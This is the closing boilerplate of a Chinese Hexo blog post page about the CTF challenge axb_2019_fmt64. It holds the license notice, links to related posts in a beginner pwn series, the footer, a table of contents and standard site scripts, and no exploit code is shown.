        <a id="original-link" href="https://www.imalun.com/2025/07/17/axb-2019-fmt64/" title="axb_2019_fmt64">https://www.imalun.com/2025/07/17/axb-2019-fmt64/</a>
    </li>
    <li class="trm-post-copyright-license">
        <strong>版权声明：</strong>
        本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 ">CC BY-NC-SA 4.0</a> 许可协议。
    </li>
</ul>


</div>
<div class="trm-post-next-prev row">
    <div class="col-lg-12">
        <!-- title -->
        <h5 class="trm-title-with-divider">
            其他文章
            <span data-number="02"></span>
        </h5>
    </div>
    
        <div class="col-lg-6">
    <div class="trm-blog-card trm-scroll-animation">
        <a href="/2025/10/25/%E5%9C%A82-27%E7%89%88%E6%9C%AC%E4%B8%AD%E5%B0%9D%E8%AF%95%E8%BF%9B%E8%A1%8C%E5%A0%86%E7%9A%84%E7%AE%80%E5%8D%95%E6%94%BB%E5%87%BB/" class="trm-cover-frame trm-anima-link">
            
            
                <img alt="cover" class="no-fancybox" src="/%E3%80%90%E5%93%B2%E9%A3%8E%E5%A3%81%E7%BA%B8%E3%80%91%E4%B8%A4%E7%A7%8D%E8%89%B2%E8%B0%83%E7%9A%84%E5%A4%B4%E5%8F%91-%E5%8A%A8%E6%BC%AB%E5%A5%B3%E5%AD%A9.png">
            
        </a>
        
        <div class="trm-card-descr">
            <div class="trm-label trm-category trm-mb-20">
                <a href=" /categories/%E3%80%8A%E4%BB%8E0%E5%88%B0%E6%9C%89pwn%E5%AD%A6%E4%B9%A0%E7%B3%BB%E5%88%97%E3%80%8B/">
                    《从0到有pwn学习系列》
                </a>
            </div>
            <h5>
                <a href="/2025/10/25/%E5%9C%A82-27%E7%89%88%E6%9C%AC%E4%B8%AD%E5%B0%9D%E8%AF%95%E8%BF%9B%E8%A1%8C%E5%A0%86%E7%9A%84%E7%AE%80%E5%8D%95%E6%94%BB%E5%87%BB/" class="trm-anima-link">
                    在2.27版本中尝试进行堆的简单攻击
                </a>
            </h5>
            <div class="trm-divider trm-mb-20 trm-mt-20"></div>
            <ul class="trm-card-data trm-label">
                <li>25/10/25</li>
                <li>21:01</li>
                
                    <li>2.9k</li>
                
                
                    <li>13</li>
                
            </ul>
        </div>
    </div>
</div>
    
    
        <div class="col-lg-6">
    <div class="trm-blog-card trm-scroll-animation">
        <a href="/2025/07/16/%E5%A0%86%E5%88%9D%E5%AD%A6/" class="trm-cover-frame trm-anima-link">
            
            
                <img alt="cover" class="no-fancybox" src="/images/2.png">
            
        </a>
        
        <div class="trm-card-descr">
            <div class="trm-label trm-category trm-mb-20">
                <a href=" /categories/%E3%80%8A%E4%BB%8E0%E5%88%B0%E6%9C%89pwn%E5%AD%A6%E4%B9%A0%E7%B3%BB%E5%88%97%E3%80%8B/">
                    《从0到有pwn学习系列》
                </a>
            </div>
            <h5>
                <a href="/2025/07/16/%E5%A0%86%E5%88%9D%E5%AD%A6/" class="trm-anima-link">
                    堆初学
                </a>
            </h5>
            <div class="trm-divider trm-mb-20 trm-mt-20"></div>
            <ul class="trm-card-data trm-label">
                <li>25/07/16</li>
                <li>11:26</li>
                
                    <li>5.2k</li>
                
                
                    <li>19</li>
                
            </ul>
        </div>
    </div>
</div>
    
</div>

    



                    <div class="trm-divider footer-divider"></div>

                    <!-- footer -->
                    <footer class="trm-footer-card trm-scroll-animation">

    

    
        <div class="trm-footer-item">
            <span>© 2025 - 2025</span>
            <span class="footer-separator"data-separator=" · "></span>
            <span class="trm-accent-color">enp0</span>
        </div>
    

    
        <div class="trm-footer-item">
            <span>
                由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0
            </span>
            <span class="footer-separator" data-separator=" | "></span>
            <span> 
                主题 - 
                <a rel="noopener" href='https://github.com/MaLuns/hexo-theme-async' target='_blank'>Async</a>
                v2.2.6
            </span>
        </div>
      

    
        <div class="trm-footer-item blog-run-long"></div>
     

     
</footer>
                    <!-- footer end -->

                </div>
            </div>
        </div>
    </div>
</div>
            <!-- body end -->

            

    <div id="post-toc" class="trm-post-toc">
      <div class="trm-post-toc-header">
        目录导航
				<span id="post-toc-top">
					置顶
				</span>
      </div>
      <div class="trm-post-toc-content">
        <ol class="trm-toc"><li class="trm-toc-item trm-toc-level-1" title="axb_2019_fmt64"><a rel="nofollow" class="trm-toc-link" href="#axb-2019-fmt64"><span class="trm-toc-number">1.</span> <span class="trm-toc-text">axb_2019_fmt64</span></a><ol class="trm-toc-child"><li class="trm-toc-item trm-toc-level-2" title="前言："><a rel="nofollow" class="trm-toc-link" href="#前言："><span class="trm-toc-number">1.1.</span> <span class="trm-toc-text">前言：</span></a></li><li class="trm-toc-item trm-toc-level-2" title="题目"><a rel="nofollow" class="trm-toc-link" href="#题目"><span class="trm-toc-number">1.2.</span> <span class="trm-toc-text">题目</span></a></li><li class="trm-toc-item trm-toc-level-2" title="exp"><a rel="nofollow" class="trm-toc-link" href="#exp"><span class="trm-toc-number">1.3.</span> <span class="trm-toc-text">exp</span></a></li><li class="trm-toc-item trm-toc-level-2" title="Albert Kesselring师傅的exp"><a rel="nofollow" class="trm-toc-link" href="#Albert-Kesselring师傅的exp"><span class="trm-toc-number">1.4.</span> <span class="trm-toc-text">Albert Kesselring师傅的exp</span></a></li></ol></li></ol>
      </div>
    </div>

            
<div class="trm-fixed-container">
    
        <div class="trm-fixed-btn post-toc-btn" data-title="目录">
            <i class="iconfont fas fa-th-list"></i>
        </div>
    
    
        <div class="trm-fixed-btn" data-title="阅读模式" onclick="asyncFun.switchReadMode()">
            <i class="iconfont fas fa-book-reader"></i>
        </div>
    
    
        <div class="trm-fixed-btn hidden-md" data-title="单栏和双栏切换" onclick="asyncFun.switchSingleColumn()">
            <i class="iconfont fas fa-arrows-alt-h"></i>
        </div>
    
    <div id="trm-back-top" class="trm-fixed-btn" data-title="回到顶部">
        <i class="iconfont fas fa-arrow-up"></i>
    </div>
</div>
        </div>
      </div>
      <!-- scroll container end -->
  </div>
  <!-- app wrapper end -->

  
  <!-- Plugin -->




    
    
<script src="https://npm.elemecdn.com/@fancyapps/ui@4.0/dist/fancybox.umd.js"></script>

    

    
        <script src="/js/plugins/typing.js?v=2.2.6"></script>
    

    

    <!-- 数学公式 -->
    

    <!-- 评论插件 -->
    
        

        
    

		




    <!-- Service Worker -->
    
    <!-- baidu push -->
    
    <script data-swup-reload-script>
        (function () {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            }
            else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>



<script id="async-script" src="/js/main.js?v=2.2.6"></script>

<!-- CDN -->


    
<script src="/demo.js"></script>


    

    



</body>

</html>